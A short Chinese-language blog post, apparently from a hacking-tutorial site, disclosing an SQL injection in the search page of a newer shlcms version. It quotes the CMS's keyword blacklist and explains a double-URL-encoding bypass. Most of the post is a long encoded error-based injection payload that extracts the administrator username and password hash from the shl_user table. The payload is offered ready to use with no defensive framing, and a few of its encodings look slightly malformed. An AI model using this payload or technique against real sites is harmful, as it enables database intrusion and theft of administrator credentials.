新版shlcms 注入 – 网站安全 – 自学php

2020-10-10 分类：黑客攻防阅读(304) 评论(0) 扫描二维码

新的一年也是自己的第16个生日,所以在今天写点自己挖的渣渣洞出来,祝自己生日快乐。
我不太会,所以只能挖这些渣渣咯

新版的shlcms
shlcms\content\search\index.php对keyword做了过滤


[attach]2546[/attach]
function checkSqlStr($string)
{
      $string = strtolower($string);
      return preg_match('/select|insert|update|delete|\'|\/\*|\*|\.\.\/|\.\/|union|into|load_file|outfile|_user/i', $string);

}

因为会解码所以无视过滤的没过滤%就好

keyword=yu%25%2527%25%36%31%25%36%45%25%36%34%25%32%38%25%37%33%25%36%35%25%36%43%255%37%34%25%32%38%25%32%41%25%32%39%25%32%43%25%36%33%25%36%46%25%36%45%25%36%33%25%36%31%25%37%34%36%35%25%36%33%25%37%34%25%32%30%25%33%31%25%32%30%25%36%36%25%37%32%25%36%46%25%36%44%25%32%38%25%37%33%25%36%35%25%36%43%25%36%35%25%36%33%25%37%34%25%32%30%25%36%33%25%36%46%25%37%35%25%36%45%2%25%32%38%25%36%36%25%36%43%25%36%46%25%36%46%25%37%32%25%32%38%25%37%32%25%36%31%25%36%45%25%36%34%25%32%38%25%33%30%25%32%39%25%32%41%25%33%32%25%32%39%25%32%43%25%33%30%25%37%38%25%33%33%25%36%31%25%32%43%25%32%38%25%37%33%25%36%35%25%36%43%25%36%35%25%36%33%25%37%34%25%32%38%25%37%33%25%36%35%25%36%43%25%36%35%25%36%33%25%37%34%25%32%38%25%35%33%25%34%35%25%34%43%25%34%35%25%34%33%25%35%34%25%32%30%25%36%33%25%36%46%25%36%45%25%36%33%25%36%31%25%37%34%25%32%38%25%37%35%25%37%33%25%36%35%25%37%32%25%36%45%25%36%31%25%36%44%25%36%35%25%32%43%25%33%30%25%37%38%25%33%33%25%36%31%25%32%43%25%37%30%25%37%37%25%36%34%25%32%39%25%34%36%25%35%32%25%34%46%25%34%44%25%32%30%25%37%33%25%36%38%25%36%43%25%35%46%25%37%35%25%37%33%25%36%35%25%37%32%25%32%30%25%36%43%25%36%39%25%36%44%25%36%39%25%37%34%25%32%30%25%33%30%25%32%43%25%33%31%25%32%39%25%32%39%25%36%36%25%37%32%25%36%46%25%36%44%25%32%30%25%36%39%25%36%45%25%36%36%25%36%46%25%37%32%25%36%44%25%36%31%25%37%34%25%36%39%25%36%46%25%36%45%25%35%46%25%37%33%25%36%33%25%36%38%25%36%35%25%36%44%25%36%31%25%32%45%25%37%34%25%36%31%25%36%32%25%36%43%25%36%35%25%37%33%25%32%30%25%36%43%25%36%39%25%36%44%25%36%39%25%37%34%25%32%30%25%33%30%25%32%43%25%33%31%25%32%39%25%32%39%25%37%38%25%32%30%25%36%36%25%37%32%25%36%46%25%36%44%25%32%30%25%36%39%25%36%45%25%36%36%25%36%46%25%37%32%25%36%44%25%36%31%25%37%34%25%36%39%25%36%46%25%36%45%25%35%46%25%37%33%25%36%33%25%36%38%25%36%35%25%36%44%25%36%31%25%32%45%25%37%34%25%36%31%25%36%32%25%36%43%25%36%35%25%37%33%25%32%30%25%36%37%25%37%32%25%36%46%25%37%35%25%37%30%25%32%30%25%36%32%25%37%39%25%32%30%25%37%38%25%32%39%25%36%31%25%32%39%25%32%30%25%36%31%25%36%45%25%36%34%25%32%30%25%33%31%25%33%44%25%33%31%23

密码好像是sha1 +md5 加什么什么的反正一般破不出来就对了。

0 个人已赞

赞一个收藏 (0)

未经允许不得转载：起风网 » 新版shlcms 注入 – 网站安全 – 自学php

标签：黑客技术学习黑客攻防

825e5b70b68d744d

相关推荐

评论抢沙发

评论前必须登录！